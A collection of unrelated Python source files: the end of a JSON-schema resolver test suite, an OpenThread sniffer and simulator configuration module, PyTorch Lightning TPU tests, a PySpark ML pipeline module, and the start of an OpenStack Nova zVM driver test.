self.assertEqual(resolved, schema)
def test_custom_uri_scheme_handlers(self):
schema = {"foo": "bar"}
ref = "foo://bar"
foo_handler = mock.Mock(return_value=schema)
resolver = RefResolver("", {}, handlers={"foo": foo_handler})
with resolver.resolving(ref) as resolved:
self.assertEqual(resolved, schema)
foo_handler.assert_called_once_with(ref)
def test_cache_remote_on(self):
ref = "foo://bar"
foo_handler = mock.Mock()
resolver = RefResolver(
"", {}, cache_remote=True, handlers={"foo" : foo_handler},
)
with resolver.resolving(ref):
pass
with resolver.resolving(ref):
pass
foo_handler.assert_called_once_with(ref)
def test_cache_remote_off(self):
ref = "foo://bar"
foo_handler = mock.Mock()
resolver = RefResolver(
"", {}, cache_remote=False, handlers={"foo" : foo_handler},
)
with resolver.resolving(ref):
pass
with resolver.resolving(ref):
pass
self.assertEqual(foo_handler.call_count, 2)
def test_if_you_give_it_junk_you_get_a_resolution_error(self):
ref = "foo://bar"
foo_handler = mock.Mock(side_effect=ValueError("Oh no! What's this?"))
resolver = RefResolver("", {}, handlers={"foo" : foo_handler})
with self.assertRaises(RefResolutionError) as err:
with resolver.resolving(ref):
pass
self.assertEqual(str(err.exception), "Oh no! What's this?")
def sorted_errors(errors):
def key(error):
return (
[str(e) for e in error.path],
[str(e) for e in error.schema_path]
)
return sorted(errors, key=key)
|
|
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import os
from enum import Enum
import coap
import ipv6
import lowpan
import message
import mle
import net_crypto
import network_data
import network_layer
import simulator
import sniffer
MESH_LOCAL_PREFIX = 'fdde:ad00:beef::/64'
MESH_LOCAL_PREFIX_REGEX_PATTERN = '^fdde:ad00:beef:(0){0,4}:'
ROUTING_LOCATOR = '64/:0:ff:fe00:/16'
ROUTING_LOCATOR_REGEX_PATTERN = '.*:(0)?:0{0,2}ff:fe00:\w{1,4}$'
LINK_LOCAL = 'fe80:/112'
LINK_LOCAL_REGEX_PATTERN = '^fe80:.*'
ALOC_FLAG_REGEX_PATTERN = '.*:fc..$'
LINK_LOCAL_All_THREAD_NODES_MULTICAST_ADDRESS = 'ff32:40:fdde:ad00:beef:0:0:1'
REALM_LOCAL_All_THREAD_NODES_MULTICAST_ADDRESS = 'ff33:40:fdde:ad00:beef:0:0:1'
REALM_LOCAL_ALL_ROUTERS_ADDRESS = 'ff03::2'
LINK_LOCAL_ALL_NODES_ADDRESS = 'ff02::1'
LINK_LOCAL_ALL_ROUTERS_ADDRESS = 'ff02::2'
DEFAULT_MASTER_KEY = bytearray([0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff])
ADDRESS_TYPE = Enum('ADDRESS_TYPE', ('LINK_LOCAL', 'GLOBAL', 'RLOC', 'ALOC', 'ML_EID'))
RSSI = {'LINK_QULITY_0': -100, 'LINK_QULITY_1': -95, 'LINK_QULITY_2': -85, 'LINK_QULITY_3': -65}
SNIFFER_ID = int(os.getenv('SNIFFER_ID', 34))
PANID = 0xface
MAX_NEIGHBOR_AGE = 100
INFINITE_COST_TIMEOUT = 90
MAX_ADVERTISEMENT_INTERVAL = 32
MLE_END_DEVICE_TIMEOUT = 100
AQ_TIMEOUT = 3
ADDRESS_QUERY_INITIAL_RETRY_DELAY = 15
VIRTUAL_TIME = bool(os.getenv('VIRTUAL_TIME', False))
def create_default_network_data_prefix_sub_tlvs_factories():
return {
network_data.TlvType.HAS_ROUTE: network_data.HasRouteFactory(
routes_factory=network_data.RoutesFactory(
route_factory=network_data.RouteFactory())
),
network_data.TlvType.BORDER_ROUTER: network_data.BorderRouterFactory(),
network_data.TlvType.LOWPAN_ID: network_data.LowpanIdFactory()
}
def create_default_network_data_prefix_sub_tlvs_factory():
return network_data.PrefixSubTlvsFactory(
sub_tlvs_factories=create_default_network_data_prefix_sub_tlvs_factories())
def create_default_network_data_service_sub_tlvs_factories():
return {
network_data.TlvType.SERVER: network_data.ServerFactory()
}
def create_default_network_data_service_sub_tlvs_factory():
return network_data.ServiceSubTlvsFactory(
sub_tlvs_factories=create_default_network_data_service_sub_tlvs_factories())
def create_default_network_data_commissioning_data_sub_tlvs_factories():
return {
network_data.MeshcopTlvType.STEERING_DATA: network_data.SteeringDataFactory(),
network_data.MeshcopTlvType.BORDER_AGENT_LOCATOR: network_data.BorderAgentLocatorFactory(),
network_data.MeshcopTlvType.COMMISSIONER_SESSION_ID: network_data.CommissionerSessionIdFactory(),
network_data.MeshcopTlvType.COMMISSIONER_UDP_PORT: network_data.CommissionerUdpPortFactory(),
}
def create_default_network_data_commissioning_data_sub_tlvs_factory():
return network_data.CommissioningDataSubTlvsFactory(
sub_tlvs_factories=create_default_network_data_commissioning_data_sub_tlvs_factories())
def create_default_network_data_tlvs_factories():
return {
network_data.TlvType.PREFIX: network_data.PrefixFactory(
sub_tlvs_factory=create_default_network_data_prefix_sub_tlvs_factory()
),
network_data.TlvType.SERVICE: network_data.ServiceFactory(
sub_tlvs_factory=create_default_network_data_service_sub_tlvs_factory()
),
network_data.TlvType.COMMISSIONING: network_data.CommissioningDataFactory(
sub_tlvs_factory=create_default_network_data_commissioning_data_sub_tlvs_factory()
),
}
def create_default_network_data_tlvs_factory():
return network_data.NetworkDataTlvsFactory(
sub_tlvs_factories=create_default_network_data_tlvs_factories())
def create_default_mle_tlv_route64_factory():
return mle.Route64Factory(
link_quality_and_route_data_factory=mle.LinkQualityAndRouteDataFactory())
def create_default_mle_tlv_network_data_factory():
return mle.NetworkDataFactory(
network_data_tlvs_factory=create_default_network_data_tlvs_factory())
def create_default_mle_tlv_address_registration_factory():
return mle.AddressRegistrationFactory(
addr_compressed_factory=mle.AddressCompressedFactory(),
addr_full_factory=mle.AddressFullFactory())
def create_default_mle_tlvs_factories():
return {
mle.TlvType.SOURCE_ADDRESS: mle.SourceAddressFactory(),
mle.TlvType.MODE: mle.ModeFactory(),
mle.TlvType.TIMEOUT: mle.TimeoutFactory(),
mle.TlvType.CHALLENGE: mle.ChallengeFactory(),
mle.TlvType.RESPONSE: mle.ResponseFactory(),
mle.TlvType.LINK_LAYER_FRAME_COUNTER: mle.LinkLayerFrameCounterFactory(),
mle.TlvType.MLE_FRAME_COUNTER: mle.MleFrameCounterFactory(),
mle.TlvType.ROUTE64: create_default_mle_tlv_route64_factory(),
mle.TlvType.ADDRESS16: mle.Address16Factory(),
mle.TlvType.LEADER_DATA: mle.LeaderDataFactory(),
mle.TlvType.NETWORK_DATA: create_default_mle_tlv_network_data_factory(),
mle.TlvType.TLV_REQUEST: mle.TlvRequestFactory(),
mle.TlvType.SCAN_MASK: mle.ScanMaskFactory(),
mle.TlvType.CONNECTIVITY: mle.ConnectivityFactory(),
mle.TlvType.LINK_MARGIN: mle.LinkMarginFactory(),
mle.TlvType.STATUS: mle.StatusFactory(),
mle.TlvType.VERSION: mle.VersionFactory(),
mle.TlvType.ADDRESS_REGISTRATION: create_default_mle_tlv_address_registration_factory(),
mle.TlvType.CHANNEL: mle.ChannelFactory(),
mle.TlvType.PANID: mle.PanIdFactory(),
mle.TlvType.ACTIVE_TIMESTAMP: mle.ActiveTimestampFactory(),
mle.TlvType.PENDING_TIMESTAMP: mle.PendingTimestampFactory(),
mle.TlvType.ACTIVE_OPERATIONAL_DATASET: mle.ActiveOperationalDatasetFactory(),
mle.TlvType.PENDING_OPERATIONAL_DATASET: mle.PendingOperationalDatasetFactory(),
mle.TlvType.THREAD_DISCOVERY: mle.ThreadDiscoveryFactory()
}
def create_default_mle_crypto_engine(master_key):
return net_crypto.CryptoEngine(crypto_material_creator=net_crypto.MleCryptoMaterialCreator(master_key))
def create_default_mle_message_factory(master_key):
return mle.MleMessageFactory(
aux_sec_hdr_factory=net_crypto.AuxiliarySecurityHeaderFactory(),
mle_command_factory=mle.MleCommandFactory(
tlvs_factories=create_default_mle_tlvs_factories()),
crypto_engine=create_default_mle_crypto_engine(master_key))
def create_deafult_network_tlvs_factories():
return {
network_layer.TlvType.TARGET_EID: network_layer.TargetEidFactory(),
network_layer.TlvType.MAC_EXTENDED_ADDRESS: network_layer.MacExtendedAddressFactory(),
network_layer.TlvType.RLOC16: network_layer.Rloc16Factory(),
network_layer.TlvType.ML_EID: network_layer.MlEidFactory(),
network_layer.TlvType.STATUS: network_layer.StatusFactory(),
network_layer.TlvType.TIME_SINCE_LAST_TRANSACTION: network_layer.TimeSinceLastTransactionFactory(),
network_layer.TlvType.ROUTER_MASK: network_layer.RouterMaskFactory(),
network_layer.TlvType.ND_OPTION: network_layer.NdOptionFactory(),
network_layer.TlvType.ND_DATA: network_layer.NdDataFactory(),
network_layer.TlvType.THREAD_NETWORK_DATA: network_layer.ThreadNetworkDataFactory(create_default_network_data_tlvs_factory()),
# Routing information are distributed in a Thread network by MLE Routing TLV
# which is in fact MLE Route64 TLV. Thread specificaton v1.1. - Chapter 5.20
network_layer.TlvType.MLE_ROUTING: create_default_mle_tlv_route64_factory()
}
def create_default_network_tlvs_factory():
return network_layer.NetworkLayerTlvsFactory(
tlvs_factories=create_deafult_network_tlvs_factories())
def create_default_uri_path_based_payload_factories():
network_layer_tlvs_factory = create_default_network_tlvs_factory()
return {
"/a/as": network_layer_tlvs_factory,
"/a/aq": network_layer_tlvs_factory,
"/a/ar": network_layer_tlvs_factory,
"/a/ae": network_layer_tlvs_factory,
"/a/an": network_layer_tlvs_factory,
"/a/sd": network_layer_tlvs_factory
}
def create_default_coap_message_factory():
return coap.CoapMessageFactory(options_factory=coap.CoapOptionsFactory(),
uri_path_based_payload_factories=create_default_uri_path_based_payload_factories(),
message_id_to_uri_path_binder=coap.CoapMessageIdToUriPathBinder())
def create_default_ipv6_hop_by_hop_options_factories():
return {
109: ipv6.MPLOptionFactory()
}
def create_default_ipv6_hop_by_hop_options_factory():
return ipv6.HopByHopOptionsFactory(
options_factories=create_default_ipv6_hop_by_hop_options_factories())
def create_default_based_on_src_dst_ports_udp_payload_factory(master_key):
mle_message_factory = create_default_mle_message_factory(master_key)
coap_message_factory = create_default_coap_message_factory()
return ipv6.UdpBasedOnSrcDstPortsPayloadFactory(
src_dst_port_based_payload_factories={
19788: mle_message_factory,
61631: coap_message_factory
}
)
def create_default_ipv6_icmp_body_factories():
return {
ipv6.ICMP_DESTINATION_UNREACHABLE: ipv6.ICMPv6DestinationUnreachableFactory(),
ipv6.ICMP_ECHO_REQUEST: ipv6.ICMPv6EchoBodyFactory(),
ipv6.ICMP_ECHO_RESPONSE: ipv6.ICMPv6EchoBodyFactory(),
"default": ipv6.BytesPayloadFactory()
}
def create_default_ipv6_upper_layer_factories(master_key):
return {
ipv6.IPV6_NEXT_HEADER_UDP: ipv6.UDPDatagramFactory(
udp_header_factory=ipv6.UDPHeaderFactory(),
udp_payload_factory=create_default_based_on_src_dst_ports_udp_payload_factory(master_key)
),
ipv6.IPV6_NEXT_HEADER_ICMP: ipv6.ICMPv6Factory(
body_factories=create_default_ipv6_icmp_body_factories()
)
}
def create_default_lowpan_extension_headers_factories():
return {
ipv6.IPV6_NEXT_HEADER_HOP_BY_HOP: lowpan.LowpanHopByHopFactory(
hop_by_hop_options_factory=create_default_ipv6_hop_by_hop_options_factory()
)
}
def create_default_ipv6_extension_headers_factories():
return {
ipv6.IPV6_NEXT_HEADER_HOP_BY_HOP: ipv6.HopByHopFactory(
hop_by_hop_options_factory=create_default_ipv6_hop_by_hop_options_factory())
}
def create_default_ipv6_packet_factory(master_key):
return ipv6.IPv6PacketFactory(
ehf=create_default_ipv6_extension_headers_factories(),
ulpf=create_default_ipv6_upper_layer_factories(master_key)
)
def create_default_lowpan_decompressor(context_manager):
return lowpan.LowpanDecompressor(
lowpan_ip_header_factory=lowpan.LowpanIpv6HeaderFactory(
context_manager=context_manager
),
lowpan_extension_headers_factory=lowpan.LowpanExtensionHeadersFactory(
ext_headers_factories=create_default_lowpan_extension_headers_factories()
),
lowpan_udp_header_factory=lowpan.LowpanUdpHeaderFactory()
)
def create_default_thread_context_manager():
context_manager = lowpan.ContextManager()
context_manager[0] = lowpan.Context(MESH_LOCAL_PREFIX)
return context_manager
def create_default_lowpan_parser(context_manager, master_key=DEFAULT_MASTER_KEY):
return lowpan.LowpanParser(
lowpan_mesh_header_factory=lowpan.LowpanMeshHeaderFactory(),
lowpan_decompressor=create_default_lowpan_decompressor(context_manager),
lowpan_fragements_buffers_manager=lowpan.LowpanFragmentsBuffersManager(),
ipv6_packet_factory=create_default_ipv6_packet_factory(master_key)
)
def create_default_thread_message_factory(master_key=DEFAULT_MASTER_KEY):
context_manager = create_default_thread_context_manager()
lowpan_parser = create_default_lowpan_parser(context_manager, master_key)
return message.MessageFactory(lowpan_parser=lowpan_parser)
def create_default_thread_sniffer(nodeid=SNIFFER_ID):
return sniffer.Sniffer(nodeid, create_default_thread_message_factory())
def create_default_simulator():
if VIRTUAL_TIME:
return simulator.VirtualTime()
return simulator.RealTime()
|
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import collections
from copy import deepcopy
import pytest
import torch
from torch import nn
from pytorch_lightning import Trainer
from pytorch_lightning.accelerators.cpu import CPUAccelerator
from pytorch_lightning.accelerators.tpu import TPUAccelerator
from pytorch_lightning.callbacks import Callback
from pytorch_lightning.plugins import TPUSpawnPlugin
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from tests.helpers.boring_model import BoringModel
from tests.helpers.runif import RunIf
from tests.helpers.utils import pl_multi_process_test
class WeightSharingModule(BoringModel):
def __init__(self):
super().__init__()
self.layer_1 = nn.Linear(32, 10, bias=False)
self.layer_2 = nn.Linear(10, 32, bias=False)
self.layer_3 = nn.Linear(32, 10, bias=False)
self.layer_3.weight = self.layer_1.weight
def forward(self, x):
x = self.layer_1(x)
x = self.layer_2(x)
x = self.layer_3(x)
return x
@RunIf(tpu=True)
@pl_multi_process_test
def test_resume_training_on_cpu(tmpdir):
"""Checks if training can be resumed from a saved checkpoint on CPU"""
# Train a model on TPU
model = BoringModel()
trainer = Trainer(checkpoint_callback=True, max_epochs=1, tpu_cores=8)
trainer.fit(model)
model_path = trainer.checkpoint_callback.best_model_path
# Verify saved Tensors are on CPU
ckpt = torch.load(model_path)
weight_tensor = list(ckpt["state_dict"].values())[0]
assert weight_tensor.device == torch.device("cpu")
# Verify that training is resumed on CPU
trainer = Trainer(
resume_from_checkpoint=model_path, checkpoint_callback=True, max_epochs=1, default_root_dir=tmpdir
)
trainer.fit(model)
assert trainer.state.finished, f"Training failed with {trainer.state}"
@RunIf(tpu=True)
@pl_multi_process_test
def test_if_test_works_after_train(tmpdir):
"""Ensure that .test() works after .fit()"""
# Train a model on TPU
model = BoringModel()
trainer = Trainer(max_epochs=1, tpu_cores=8, default_root_dir=tmpdir, fast_dev_run=True)
trainer.fit(model)
assert len(trainer.test(model)) == 1
@RunIf(tpu=True)
@pl_multi_process_test
def test_weight_tying_warning(tmpdir, capsys=None):
"""
Ensure a warning is thrown if model parameter lengths do not match
post moving to device.
"""
model = WeightSharingModule()
trainer = Trainer(checkpoint_callback=True, max_epochs=1, tpu_cores=1)
with pytest.warns(UserWarning, match=r"The model layers do not match after moving to the target device."):
trainer.fit(model)
@RunIf(tpu=True)
@pl_multi_process_test
def test_if_weights_tied(tmpdir, capsys=None):
"""
Test if weights are properly tied on `on_post_move_to_device`.
Ensure no warning for parameter mismatch is thrown.
"""
class Model(WeightSharingModule):
def on_post_move_to_device(self):
self.layer_3.weight = self.layer_1.weight
model = Model()
trainer = Trainer(checkpoint_callback=True, max_epochs=1, tpu_cores=1)
with pytest.warns(UserWarning, match="The model layers do not match"):
trainer.fit(model)
@RunIf(tpu=True)
def test_accelerator_tpu():
trainer = Trainer(accelerator="tpu", tpu_cores=8)
assert trainer._device_type == "tpu"
assert isinstance(trainer.accelerator, TPUAccelerator)
with pytest.raises(
MisconfigurationException, match="You passed `accelerator='tpu'`, but you didn't pass `tpu_cores` to `Trainer`"
):
trainer = Trainer(accelerator="tpu")
@RunIf(tpu=True)
def test_accelerator_cpu_with_tpu_cores_flag():
trainer = Trainer(accelerator="cpu", tpu_cores=8)
assert trainer._device_type == "cpu"
assert isinstance(trainer.accelerator, CPUAccelerator)
@RunIf(tpu=True)
def test_accelerator_tpu_with_auto():
trainer = Trainer(accelerator="auto", tpu_cores=8)
assert trainer._device_type == "tpu"
assert isinstance(trainer.accelerator, TPUAccelerator)
@RunIf(tpu=True)
def test_accelerator_tpu_with_devices():
trainer = Trainer(accelerator="tpu", devices=8)
assert trainer.tpu_cores == 8
assert isinstance(trainer.training_type_plugin, TPUSpawnPlugin)
assert isinstance(trainer.accelerator, TPUAccelerator)
@RunIf(tpu=True)
def test_accelerator_auto_with_devices_tpu():
trainer = Trainer(accelerator="auto", devices=8)
assert trainer._device_type == "tpu"
assert trainer.tpu_cores == 8
@RunIf(tpu=True)
def test_accelerator_tpu_with_tpu_cores_priority():
"""Test for checking `tpu_cores` flag takes priority over `devices`."""
tpu_cores = 8
with pytest.warns(UserWarning, match="The flag `devices=1` will be ignored,"):
trainer = Trainer(accelerator="tpu", devices=1, tpu_cores=tpu_cores)
assert trainer.tpu_cores == tpu_cores
@RunIf(tpu=True)
def test_set_devices_if_none_tpu():
trainer = Trainer(accelerator="tpu", tpu_cores=8)
assert trainer.devices == 8
@RunIf(tpu=True)
def test_manual_optimization_tpus(tmpdir):
class ManualOptimizationModel(BoringModel):
count = 0
called = collections.defaultdict(int)
def __init__(self):
super().__init__()
self.automatic_optimization = False
@property
def should_update(self):
return self.count % 2 == 0
def on_train_batch_start(self, batch, batch_idx, dataloader_idx):
self.called["on_train_batch_start"] += 1
self.weight_before = self.layer.weight.clone()
def training_step(self, batch, batch_idx):
self.called["training_step"] += 1
opt = self.optimizers()
output = self.layer(batch)
loss = self.loss(batch, output)
if self.should_update:
self.manual_backward(loss)
opt.step()
opt.zero_grad()
return loss
def on_train_batch_end(self, outputs, batch, batch_idx, dataloader_idx):
self.called["on_train_batch_end"] += 1
after_before = self.layer.weight.clone()
if self.should_update:
assert not torch.equal(self.weight_before, after_before), self.count
else:
assert torch.equal(self.weight_before, after_before)
assert torch.all(self.layer.weight.grad == 0)
self.count += 1
def on_train_end(self):
assert self.called["training_step"] == 5
assert self.called["on_train_batch_start"] == 5
assert self.called["on_train_batch_end"] == 5
class TestManualOptimizationCallack(Callback):
def on_train_end(self, trainer, pl_module):
opt = pl_module.optimizers()
assert opt._total_optimizer_step_calls == 3
model = ManualOptimizationModel()
model_copy = deepcopy(model)
model.training_step_end = None
model.training_epoch_end = None
trainer = Trainer(
max_epochs=1,
default_root_dir=tmpdir,
limit_train_batches=5,
limit_test_batches=0,
limit_val_batches=0,
tpu_cores=8,
callbacks=[TestManualOptimizationCallack()],
)
trainer.fit(model)
for param, param_copy in zip(model.parameters(), model_copy.parameters()):
assert not torch.equal(param.cpu().data, param_copy.data)
@RunIf(tpu=True)
def test_ddp_cpu_not_supported_on_tpus():
with pytest.raises(MisconfigurationException, match="`accelerator='ddp_cpu'` is not supported on TPU machines"):
Trainer(accelerator="ddp_cpu")
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABCMeta, abstractmethod
from pyspark.ml.param import Param, Params
from pyspark.ml.util import keyword_only
from pyspark.mllib.common import inherit_doc
@inherit_doc
class Estimator(Params):
"""
Abstract class for estimators that fit models to data.
"""
__metaclass__ = ABCMeta
@abstractmethod
def _fit(self, dataset):
"""
Fits a model to the input dataset. This is called by the
default implementation of fit.
:param dataset: input dataset, which is an instance of
:py:class:`pyspark.sql.DataFrame`
:returns: fitted model
"""
raise NotImplementedError()
def fit(self, dataset, params=None):
"""
Fits a model to the input dataset with optional parameters.
:param dataset: input dataset, which is an instance of
:py:class:`pyspark.sql.DataFrame`
:param params: an optional param map that overrides embedded
params. If a list/tuple of param maps is given,
this calls fit on each param map and returns a
list of models.
:returns: fitted model(s)
"""
if params is None:
params = dict()
if isinstance(params, (list, tuple)):
return [self.fit(dataset, paramMap) for paramMap in params]
elif isinstance(params, dict):
if params:
return self.copy(params)._fit(dataset)
else:
return self._fit(dataset)
else:
raise ValueError("Params must be either a param map or a list/tuple of param maps, "
"but got %s." % type(params))
@inherit_doc
class Transformer(Params):
"""
Abstract class for transformers that transform one dataset into
another.
"""
__metaclass__ = ABCMeta
@abstractmethod
def _transform(self, dataset):
"""
Transforms the input dataset with optional parameters.
:param dataset: input dataset, which is an instance of
:py:class:`pyspark.sql.DataFrame`
:returns: transformed dataset
"""
raise NotImplementedError()
def transform(self, dataset, params=None):
"""
Transforms the input dataset with optional parameters.
:param dataset: input dataset, which is an instance of
:py:class:`pyspark.sql.DataFrame`
:param params: an optional param map that overrides embedded
params.
:returns: transformed dataset
"""
if params is None:
params = dict()
if isinstance(params, dict):
if params:
return self.copy(params,)._transform(dataset)
else:
return self._transform(dataset)
else:
raise ValueError("Params must be either a param map but got %s." % type(params))
@inherit_doc
class Model(Transformer):
"""
Abstract class for models that are fitted by estimators.
"""
__metaclass__ = ABCMeta
@inherit_doc
class Pipeline(Estimator):
"""
A simple pipeline, which acts as an estimator. A Pipeline consists
of a sequence of stages, each of which is either an
:py:class:`Estimator` or a :py:class:`Transformer`. When
:py:meth:`Pipeline.fit` is called, the stages are executed in
order. If a stage is an :py:class:`Estimator`, its
:py:meth:`Estimator.fit` method will be called on the input
dataset to fit a model. Then the model, which is a transformer,
will be used to transform the dataset as the input to the next
stage. If a stage is a :py:class:`Transformer`, its
:py:meth:`Transformer.transform` method will be called to produce
the dataset for the next stage. The fitted model from a
:py:class:`Pipeline` is an :py:class:`PipelineModel`, which
consists of fitted models and transformers, corresponding to the
pipeline stages. If there are no stages, the pipeline acts as an
identity transformer.
"""
@keyword_only
def __init__(self, stages=None):
"""
__init__(self, stages=None)
"""
if stages is None:
stages = []
super(Pipeline, self).__init__()
#: Param for pipeline stages.
self.stages = Param(self, "stages", "pipeline stages")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
def setStages(self, value):
"""
Set pipeline stages.
:param value: a list of transformers or estimators
:return: the pipeline instance
"""
self._paramMap[self.stages] = value
return self
def getStages(self):
"""
Get pipeline stages.
"""
if self.stages in self._paramMap:
return self._paramMap[self.stages]
@keyword_only
def setParams(self, stages=None):
"""
setParams(self, stages=None)
Sets params for Pipeline.
"""
if stages is None:
stages = []
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _fit(self, dataset):
stages = self.getStages()
for stage in stages:
if not (isinstance(stage, Estimator) or isinstance(stage, Transformer)):
raise TypeError(
"Cannot recognize a pipeline stage of type %s." % type(stage))
indexOfLastEstimator = -1
for i, stage in enumerate(stages):
if isinstance(stage, Estimator):
indexOfLastEstimator = i
transformers = []
for i, stage in enumerate(stages):
if i <= indexOfLastEstimator:
if isinstance(stage, Transformer):
transformers.append(stage)
dataset = stage.transform(dataset)
else: # must be an Estimator
model = stage.fit(dataset)
transformers.append(model)
if i < indexOfLastEstimator:
dataset = model.transform(dataset)
else:
transformers.append(stage)
return PipelineModel(transformers)
def copy(self, extra=None):
if extra is None:
extra = dict()
that = Params.copy(self, extra)
stages = [stage.copy(extra) for stage in that.getStages()]
return that.setStages(stages)
@inherit_doc
class PipelineModel(Model):
"""
Represents a compiled pipeline with transformers and fitted models.
"""
def __init__(self, stages):
super(PipelineModel, self).__init__()
self.stages = stages
def _transform(self, dataset):
for t in self.stages:
dataset = t.transform(dataset)
return dataset
def copy(self, extra=None):
if extra is None:
extra = dict()
stages = [stage.copy(extra) for stage in self.stages]
return PipelineModel(stages)
|
|
# Copyright 2017,2018 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
import os
from oslo_utils.fixture import uuidsentinel
import six
from nova import conf
from nova import context
from nova import exception
from nova.network import model as network_model
from nova import objects
from nova import test
from nova.tests.unit import fake_instance
from nova.virt import fake
from nova.virt.zvm import driver as zvmdriver
CONF = conf.CONF
class TestZVMDriver(test.NoDBTestCase):
def setUp(self):
super(TestZVMDriver, self).setUp()
self.flags(my_ip='192.168.1.1',
instance_name_template='abc%05d')
self.flags(cloud_connector_url='https://1.1.1.1:1111', group='zvm')
with mock.patch('nova.virt.zvm.utils.ConnectorClient.call') as mcall, \
mock.patch('pwd.getpwuid', return_value=mock.Mock(pw_name='test')):
mcall.return_value = {'hypervisor_hostname': 'TESTHOST',
'ipl_time': 'IPL at 11/14/17 10:47:44 EST'}
self._driver = zvmdriver.ZVMDriver(fake.FakeVirtAPI())
self._hypervisor = self._driver._hypervisor
self._context = context.RequestContext('fake_user', 'fake_project')
self._image_id = uuidsentinel.imag_id
self._instance_values = {
'display_name': 'test',
'uuid': uuidsentinel.inst_id,
'vcpus': 1,
'memory_mb': 1024,
'image_ref': self._image_id,
'root_gb': 0,
}
self._instance = fake_instance.fake_instance_obj(
self._context, **self._instance_values)
self._instance.flavor = objects.Flavor(name='testflavor',
vcpus=1, root_gb=3, ephemeral_gb=10,
swap=0, memory_mb=512, extra_specs={})
self._eph_disks = [{'guest_format': u'ext3',
'device_name': u'/dev/sdb',
'disk_bus': None,
'device_type': None,
'size': 1},
{'guest_format': u'ext4',
'device_name': u'/dev/sdc',
'disk_bus': None,
'device_type': None,
'size': 2}]
self._block_device_info = {'swap': None,
'root_device_name': u'/dev/sda',
'ephemerals': self._eph_disks,
'block_device_mapping': []}
fake_image_meta = {'status': 'active',
'properties': {'os_distro': 'rhel7.2'},
'name': 'rhel72eckdimage',
'deleted': False,
'container_format': 'bare',
'disk_format': 'raw',
'id': self._image_id,
'owner': 'cfc26f9d6af948018621ab00a1675310',
'checksum': 'b026cd083ef8e9610a29eaf71459cc',
'min_disk': 0,
'is_public': False,
'deleted_at': None,
'min_ram': 0,
'size': 465448142}
self._image_meta = objects.ImageMeta.from_dict(fake_image_meta)
subnet_4 = network_model.Subnet(cidr='192.168.0.1/24',
dns=[network_model.IP('192.168.0.1')],
gateway=
network_model.IP('192.168.0.1'),
ips=[
network_model.IP('192.168.0.100')],
routes=None)
network = network_model.Network(id=0,
bridge='fa0',
label='fake',
subnets=[subnet_4],
vlan=None,
bridge_interface=None,
injected=True)
self._network_values = {
'id': None,
'address': 'DE:AD:BE:EF:00:00',
'network': network,
'type': network_model.VIF_TYPE_OVS,
'devname': None,
'ovs_interfaceid': None,
'rxtx_cap': 3
}
self._network_info = network_model.NetworkInfo([
network_model.VIF(**self._network_values)
])
self.mock_update_task_state = mock.Mock()
def test_driver_init_no_url(self):
self.flags(cloud_connector_url=None, group='zvm')
self.assertRaises(exception.ZVMDriverException,
zvmdriver.ZVMDriver, 'virtapi')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_get_available_resource_err_case(self, call):
res = {'overallRC': 1, 'errmsg': 'err', 'rc': 0, 'rs': 0}
call.side_effect = exception.ZVMConnectorError(res)
results = self._driver.get_available_resource()
self.assertEqual(0, results['vcpus'])
self.assertEqual(0, results['memory_mb_used'])
self.assertEqual(0, results['disk_available_least'])
self.assertEqual('TESTHOST', results['hypervisor_hostname'])
def test_driver_template_validation(self):
